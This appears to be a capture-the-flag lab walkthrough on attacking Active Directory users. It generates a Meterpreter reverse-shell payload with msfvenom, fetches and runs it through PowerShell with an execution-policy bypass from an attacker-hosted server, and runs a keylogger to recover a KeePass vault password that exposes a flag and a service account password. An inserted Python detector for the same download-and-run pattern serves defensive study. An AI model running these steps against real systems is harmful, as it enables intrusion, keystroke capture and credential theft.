Exploiting AD users

Users are, unfortunately, often the weakest link in the security chain. Think of weak passwords and bad habits, such as granting overly broad permissions. Overlooking this attack surface would be a mistake:

  • Credential Management - How users store their credentials. In AD, this is quite important since users may have multiple sets of credentials and remembering all of them can be a hassle.

  • Keylogging - Often, during exploitation, we need to understand how normal users interact with a system. Together with screengrabs, keylogging can be a useful tool to gain this understanding from an attacker’s perspective.

Using our WinRM shell from Kerberos delegation, we do some post-exploitation enumeration and come across a .kdbx file in C:\Users\trevor.local\Documents. It’s likely a password vault that’s been encrypted with a strong password.

Payload

Generate a Meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.50.57.175 LPORT=443 -f psh -o pwn.ps1

Start a listener:

sudo msfconsole

msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter_reverse_tcp
msf6> set LHOST kali-vpn-ip
msf6> set LPORT 443
msf6> run

Transfer the payload to the target

Start a Python web server on Kali:

sudo python3 -m http.server 80

Download the file onto THMSERVER1 via the WinRM session and execute it:

powershell.exe -ep bypass

Create a web client object:

$wc = New-Object Net.WebClient

Download pwn.ps1 from Kali, save it in the current directory, and run it:

$wc.DownloadFile('http://10.50.57.175/pwn.ps1', "$PWD\pwn.ps1")
.\pwn.ps1
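
Seen from the defender's side, the transfer steps above leave a recognisable sequence in PowerShell command logging: an execution-policy bypass, a WebClient download to disk, then execution of the downloaded script in the same session. The following is an added example, not part of the original walkthrough; it assumes command text has already been exported (for instance from PowerShell script block logging) into (host, session, text) records, and the record layout, session ids and function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample records (not real logs): (host, session id, command text).
SAMPLE_EVENTS = [
    ("THMSERVER1", "s1", "powershell.exe -ep bypass"),
    ("THMSERVER1", "s1", "$wc = New-Object Net.WebClient"),
    ("THMSERVER1", "s1",
     "$wc.DownloadFile('http://10.50.57.175/pwn.ps1', \"$PWD\\pwn.ps1\")"),
    ("THMSERVER1", "s1", ".\\pwn.ps1"),
    ("THMSERVER1", "s2", "Get-ChildItem C:\\Users"),
    ("THMSERVER1", "s2", ".\\backup.ps1"),  # local script, never downloaded
]

BYPASS = re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I)
# Captures the source URL and the destination path of a WebClient download.
DOWNLOAD = re.compile(
    r"\.DownloadFile\(\s*['\"](https?://[^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
# A line that starts by invoking a .ps1 file, optionally via the call operator.
RUN_SCRIPT = re.compile(r"^\s*(?:&\s*)?['\"]?(\S*\.ps1)\b", re.I)

def basename(path):
    """File name without directory, lower-cased for comparison."""
    return re.split(r"[\\/]", path)[-1].lower()

def find_download_and_run(events):
    """Return one finding per script that a session downloaded and then ran."""
    state = defaultdict(lambda: {"bypass": False, "downloads": {}})
    findings = []
    for host, session, text in events:
        s = state[(host, session)]
        if BYPASS.search(text):
            s["bypass"] = True
        m = DOWNLOAD.search(text)
        if m:
            s["downloads"][basename(m.group(2))] = m.group(1)
            continue  # the download line itself is not an execution
        m = RUN_SCRIPT.match(text)
        if m and basename(m.group(1)) in s["downloads"]:
            name = basename(m.group(1))
            findings.append({"host": host, "session": session, "script": name,
                             "url": s["downloads"][name],
                             "policy_bypass": s["bypass"]})
    return findings

if __name__ == "__main__":
    for finding in find_download_and_run(SAMPLE_EVENTS):
        print(finding)
```

Correlating on the file name within one session keeps ordinary local script runs, such as the second sample session, out of the results.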

Start the keylogger

meterpreter > keyscan_start

Dump captured keystrokes

meterpreter > keyscan_dump

Stop the keylogger

meterpreter > keyscan_stop

Get flag

sudo apt install -y kpcli
kpcli

# Password is: Imreallysurenoonewillguessmypassword
kpcli:/> open PasswordDatabase.kdbx
kpcli:/> ls
kpcli:/> ls PasswordDatabase/*
kpcli:/> show -f -a PasswordDatabase/General/Flag

THM{AD.Users.Can.Give.Up.Good.Secrets}

kpcli:/> show -f -a PasswordDatabase/General/svcServMan

Sup3rStr0ngPass!@